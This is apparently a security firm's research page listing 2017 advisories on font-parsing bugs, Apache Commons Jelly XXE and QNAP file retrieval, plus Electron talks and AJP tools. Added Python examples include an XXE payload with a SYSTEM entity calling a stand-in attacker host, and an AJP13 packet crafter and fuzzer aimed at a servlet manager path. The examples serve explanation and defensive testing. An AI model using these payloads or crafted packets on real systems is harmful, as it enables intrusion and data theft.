Research is one of our founding principles and we invest heavily in it. We aim to provide research-driven application security, enabling trust in our clients' products and improving the resilience of the digital ecosystem. By discovering new vulnerabilities and attack techniques, we constantly improve our capabilities and contribute to securing the applications we all use.

Advisory

cve-2017-13850

10/31/2017

macOS Font Importer Information Disclosure

Doyensec researchers discovered a bug in Apple's macOS Font Importer. Parsing a malicious font file will result in memory corruption and information leakage.

Apple's original advisory: https://support.apple.com/en-us/HT208221

Advisory

cve-2017-13820

10/31/2017

macOS ATS Information Disclosure

Doyensec researchers discovered a bug in Apple's macOS ATS. Parsing a malicious font file will result in memory corruption and information leakage.

Apple's original advisory: https://support.apple.com/en-us/HT208144

Advisory

cve-2017-12621

09/27/2017

Apache Commons Jelly XML External Entity (XXE)

Doyensec researchers identified an XXE vulnerability in Apache Commons Jelly. When a Jelly (XML) file is parsed with Apache Xerces, a DOCTYPE that declares a SYSTEM entity pointing at a URL, combined with a reference to that entity in the body of the Jelly file, causes the parser to connect to that URL when the document is parsed. This enables XML External Entity (XXE) attacks against any application that parses untrusted Jelly scripts.

Apache Commons' original advisory: http://commons.apache.org/proper/commons-jelly/security-reports.html#CVE-2017-12621
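The entity-resolution behaviour described in this advisory, as an added example that is not part of the original advisory or of the Jelly project's code. It uses Python's xml.sax (expat) rather than Xerces: a constructed Jelly-style script declares a SYSTEM entity in its DOCTYPE and references it in the body, and a stand-in EntityResolver records the URL the parser tries to open and returns constructed bytes instead of connecting, so the block runs offline. Python disables external general entities by default, so the vulnerable configuration is reproduced by switching the feature on; the hardened variants are the default setting and a lexical handler that refuses any DOCTYPE, the same idea as the Xerces disallow-doctype-decl feature. The names parse_jelly, RecordingResolver and doctype_rejected are this example's own.

```python
"""XXE via a DOCTYPE SYSTEM entity, demonstrated offline with xml.sax (expat)."""
import io
import xml.sax
from xml.sax import handler, xmlreader

# Constructed input modelled on the advisory: a SYSTEM entity declared in the
# DOCTYPE and referenced in the body of a Jelly script. Not a real Jelly script.
MALICIOUS_JELLY = b"""<?xml version="1.0"?>
<!DOCTYPE j:jelly [
  <!ENTITY xxe SYSTEM "http://attacker.invalid/collect">
]>
<j:jelly xmlns:j="jelly:core">
  <j:set var="greeting">&xxe;</j:set>
</j:jelly>
"""


class RecordingResolver(handler.EntityResolver):
    """Stand-in for the network: records each URL the parser tries to open
    and hands back constructed bytes instead of performing the fetch.
    The default resolver would call urlopen() on the systemId instead."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = xmlreader.InputSource(systemId)
        src.setByteStream(io.BytesIO(b"content-fetched-from-attacker"))
        return src


class TextCollector(handler.ContentHandler):
    """Accumulates character data so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


class RejectDoctype:
    """Lexical handler that aborts on any DOCTYPE. This is the example's own
    equivalent of the Xerces disallow-doctype-decl feature."""

    def startDTD(self, name, public_id, system_id):
        raise xml.sax.SAXException("DOCTYPE is not allowed in Jelly scripts")

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def parse_jelly(data, allow_external_entities, reject_doctype=False):
    """Parse `data`; return (URLs the parser tried to fetch, collected text).

    allow_external_entities=True mirrors a parser that resolves SYSTEM
    entities (the pre-fix behaviour); False is the hardened setting and
    Python's default. reject_doctype=True refuses the DTD outright."""
    parser = xml.sax.make_parser()
    resolver = RecordingResolver()
    collector = TextCollector()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(collector)
    parser.setFeature(handler.feature_external_ges, allow_external_entities)
    if reject_doctype:
        parser.setProperty(handler.property_lexical_handler, RejectDoctype())
    parser.parse(io.BytesIO(data))
    return resolver.requested, "".join(collector.text).strip()


def doctype_rejected(data):
    """True if the DOCTYPE guard refused the document."""
    try:
        parse_jelly(data, allow_external_entities=False, reject_doctype=True)
    except xml.sax.SAXException:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", parse_jelly(MALICIOUS_JELLY, allow_external_entities=True))
    print("hardened:  ", parse_jelly(MALICIOUS_JELLY, allow_external_entities=False))
    print("doctype rejected:", doctype_rejected(MALICIOUS_JELLY))
```

In the vulnerable run the resolver is asked for http://attacker.invalid/collect and its content ends up in the element text, which is exactly the outbound connection the advisory describes; with external general entities disabled the reference is skipped and no URL is requested. Rejecting the DOCTYPE altogether is the stronger fix, since it also removes internal-entity tricks such as entity expansion attacks.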

Advisory

cve-2017-xxxx

09/12/2017

QNAP QTS 4.3.3 arbitrary file retrieval (as root)

An arbitrary file retrieval vulnerability was identified in QNAP QTS 4.3.3 File Manager. This functionality can be abused to download arbitrary files from the NAS filesystem as root, leading to system compromise.

Download the advisory PDF file: Doyensec_Advisory_QNAPQTS4.3_FileRetrieval.pdf

Publication

slides

07/27/2017

Electronegativity - A Study of Electron Security
Black Hat USA 2017 (Las Vegas, Nevada)

Download the presentation PDF file: us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security.pdf

Despite all predictions, native desktop apps are back. After years of porting stand-alone apps to the web, we are witnessing the inverse trend: many companies now ship native desktop apps built with the same technologies as their web counterparts. GitHub's Electron has become a popular framework for building cross-platform desktop apps with JavaScript, HTML, and CSS. While it seems easy, embedding a web app in a self-contained environment (Chromium plus Node.js) introduces new security challenges. In this presentation we illustrate Electron's security model and describe the current isolation mechanisms that prevent untrusted content from using Node.js primitives. Electron's IPC messaging, preload scripts and other internals are discussed in depth. Security-relevant BrowserWindow and WebView options are also analyzed, together with design-level weaknesses and implementation bugs in Electron.

Publication

whitepaper

07/27/2017

Electron Security Checklist - A guide for developers and auditors
Black Hat USA 2017 (Las Vegas, Nevada)

Download the whitepaper PDF file: us-17-Carettoni-Electronegativity-A-Study-Of-Electron-Security-wp.pdf

This document introduces a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications. Software developers and security auditors can benefit from this document as it provides a concise, yet comprehensive, summary of potential weaknesses and implementation bugs when developing applications using Electron.

Advisory

cve-2017-2379

04/11/2017

macOS, iOS, tvOS, watchOS CarbonCore Buffer Overflow

A memory corruption vulnerability was identified in a core component of Apple's font parsing - CarbonCore. This issue could allow an attacker to execute code during the parsing of a malicious Datafork TrueType font.

Download the advisory PDF file: Doyensec_Advisory_FontParsingOSX.pdf

Advisory

cve-2017-2435

04/11/2017

macOS, iOS, tvOS, watchOS CoreText Corrupted Loop Index

A memory corruption vulnerability was identified in a core component of Apple's font parsing - CoreText. Through a malicious TrueType Collection (.ttc) font file, CoreText enters a loop whose index is corrupted, unintentionally referencing out-of-bounds memory.

Download the advisory PDF file: Doyensec_Advisory_FontParsingOSX.pdf

Advisory

cve-2017-2439

04/11/2017

macOS, iOS, tvOS, watchOS FontParser Infoleak

An information leakage vulnerability (out-of-bounds read) was discovered in Apple's FontParser, which could allow an attacker to disclose process memory. This issue could facilitate further exploitation.

Download the advisory PDF file: Doyensec_Advisory_FontParsingOSX.pdf

Advisory

cve-2017-2450

04/11/2017

macOS, iOS, tvOS, watchOS CoreText Infoleak

An information leakage vulnerability (out-of-bounds read) was discovered in Apple's CoreText, which could allow an attacker to disclose process memory. This issue could facilitate further exploitation.

Download the advisory PDF file: Doyensec_Advisory_FontParsingOSX.pdf

Publication

slides

03/30/2017

Application security recipes for fast paced environments
Computerworld SEMAFOR 2017 (Warsaw, Poland)

Download the presentation PDF file: Application_Security_Recipes_for_Fast-Paced_Environments.pdf

Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. In fast-paced environments (e.g. startups, agile SDLC shops, etc.), traditional application security practices can slow continuous delivery or simply not address security at all. Instead, a new approach based on security automation and tactical security testing is required to make sure that important components are tested before going live. In this presentation, I will illustrate a few examples on how Silicon Valley-based startups approach security testing while seeking the perfect balance between compliance, security and business productivity.

Code

ajpfuzzer

02/27/2017

A command-line fuzzer for the Apache JServ Protocol (ajp13)

AJPFuzzer is a rudimentary fuzzer for the Apache JServ Protocol, also known as 'ajp13'. Built on top of libajp13, the tool lets you create and send AJP messages from an easy-to-use command-line interface. AJPFuzzer can craft properly formatted AJP13 messages (all message types) as well as mutations (e.g. bit flipping, messages whose declared type does not match their body, etc.), which facilitates security testing of AJP-based services such as web server AJP modules, J2EE containers, and many others.

Download the source and binary from AJPFuzzer's Github page

Code

libajp13

02/27/2017

A complete AJPv1.3 Java library

libajp13 is a fully featured open source library implementing the Apache JServ Protocol version 1.3 (ajp13), based on the Apache Protocol Reference. Thanks to libajp13, it is now possible to craft properly formatted AJP binary packets with a single line of code.

Download the source and binary from libajp13's Github page
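The packet crafting and mutation that the AJPFuzzer and libajp13 entries above describe, as an added example that is not the code of either project (both are Java; this is an independent Python sketch written from the AJPv13 protocol reference). It encodes the packet framing, the Forward Request layout, the CPing message, and the two mutation kinds the AJPFuzzer entry mentions: bit flipping with the length prefix recomputed, and a type mismatch between the prefix code and the body. The host, URI and the CPong bytes fed to parse_frame are constructed sample values, and UTF-8 for string fields is this example's assumption, since the protocol reference does not fix an encoding.

```python
"""Crafting and mutating AJP13 packets (constructed example, see lead-in)."""
import struct

CLIENT_MAGIC = b"\x12\x34"      # web server -> servlet container
CONTAINER_MAGIC = b"AB"         # servlet container -> web server
FORWARD_REQUEST, CPING, CPONG = 0x02, 0x0A, 0x09
REQ_ATTRIBUTE, REQUEST_TERMINATOR = 0x0A, 0xFF

METHODS = {"OPTIONS": 1, "GET": 2, "HEAD": 3, "POST": 4, "PUT": 5,
           "DELETE": 6, "TRACE": 7, "PROPFIND": 8}
# Headers the protocol encodes as a 2-byte code instead of a string.
COMMON_HEADERS = {
    "accept": 0xA001, "accept-charset": 0xA002, "accept-encoding": 0xA003,
    "accept-language": 0xA004, "authorization": 0xA005, "connection": 0xA006,
    "content-type": 0xA007, "content-length": 0xA008, "cookie": 0xA009,
    "cookie2": 0xA00A, "host": 0xA00B, "pragma": 0xA00C, "referer": 0xA00D,
    "user-agent": 0xA00E}


def ajp_string(value):
    """AJP string: 2-byte big-endian length, bytes, NUL; None is 0xFFFF."""
    if value is None:
        return b"\xff\xff"
    data = value.encode("utf-8")            # assumption: UTF-8 on the wire
    return struct.pack(">H", len(data)) + data + b"\x00"


def frame(payload, magic=CLIENT_MAGIC):
    """Wrap a payload in the AJP packet header (magic + 2-byte length)."""
    return magic + struct.pack(">H", len(payload)) + payload


def build_forward_request(method, uri, remote_addr, server_name, server_port,
                          headers, attributes=None, is_ssl=False):
    """Encode a Forward Request (prefix 0x02) in the field order of the spec."""
    body = bytes([FORWARD_REQUEST, METHODS[method]])
    body += ajp_string("HTTP/1.1") + ajp_string(uri)
    body += ajp_string(remote_addr) + ajp_string(None)      # remote_host unknown
    body += ajp_string(server_name) + struct.pack(">H", server_port)
    body += bytes([1 if is_ssl else 0]) + struct.pack(">H", len(headers))
    for name, value in headers.items():
        code = COMMON_HEADERS.get(name.lower())
        body += struct.pack(">H", code) if code else ajp_string(name)
        body += ajp_string(value)
    for name, value in (attributes or {}).items():           # generic req_attribute
        body += bytes([REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    return frame(body + bytes([REQUEST_TERMINATOR]))


def build_cping():
    """CPing (0x0A): a healthy container answers with a CPong (0x09) packet."""
    return frame(bytes([CPING]))


def parse_frame(packet):
    """Validate framing and return (direction, payload); raises on bad input."""
    if len(packet) < 4:
        raise ValueError("packet shorter than the 4-byte header")
    magic, length = packet[:2], struct.unpack(">H", packet[2:4])[0]
    if magic == CLIENT_MAGIC:
        direction = "client"
    elif magic == CONTAINER_MAGIC:
        direction = "container"
    else:
        raise ValueError("unknown magic %r" % magic)
    payload = packet[4:]
    if len(payload) != length:
        raise ValueError("length field %d, payload %d" % (length, len(payload)))
    return direction, payload


def flip_payload_bit(packet, bit_index):
    """Bit-flip mutation that keeps the framing valid: the length prefix is
    recomputed so the container parses the mutated body instead of
    discarding the packet at the header."""
    magic, (_, payload) = packet[:2], parse_frame(packet)
    if bit_index >= len(payload) * 8:
        raise IndexError("bit %d outside a %d-byte payload" % (bit_index, len(payload)))
    buf = bytearray(payload)
    buf[bit_index // 8] ^= 1 << (bit_index % 8)
    return frame(bytes(buf), magic)


def swap_prefix(packet, new_prefix):
    """Type-mismatch mutation: keep the body but relabel its prefix code."""
    magic, (_, payload) = packet[:2], parse_frame(packet)
    return frame(bytes([new_prefix]) + payload[1:], magic)


if __name__ == "__main__":
    req = build_forward_request("GET", "/manager/html", "127.0.0.1",
                                "localhost", 8009, {"Host": "localhost"})
    print(req.hex())
    print(build_cping().hex())
    print(parse_frame(CONTAINER_MAGIC + b"\x00\x01\x09"))   # constructed CPong
```

Sending the bytes to a container is a plain TCP write to the AJP port (commonly 8009) followed by reading a reply and passing it through parse_frame; the length check there is what tells a fuzzer apart a truncated reply from a crash, and the two mutators are deliberately applied after framing so that only the body, not the transport header, is corrupted.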

US Office
1250 Clay Street, Suite 208
94108 San Francisco - USA

John Villamil
john@doyensec.com

EMEA Office
Ul. Florianska 6, Suite 1B
03-707 Warsaw - Poland

Luca Carettoni
luca@doyensec.com

When working with Doyensec, you will be working directly with its founders. We are the points of contact, the negotiators, the problem solvers, and the hackers.

For proposals or questions: info@doyensec.com or +1 (628) 333 9093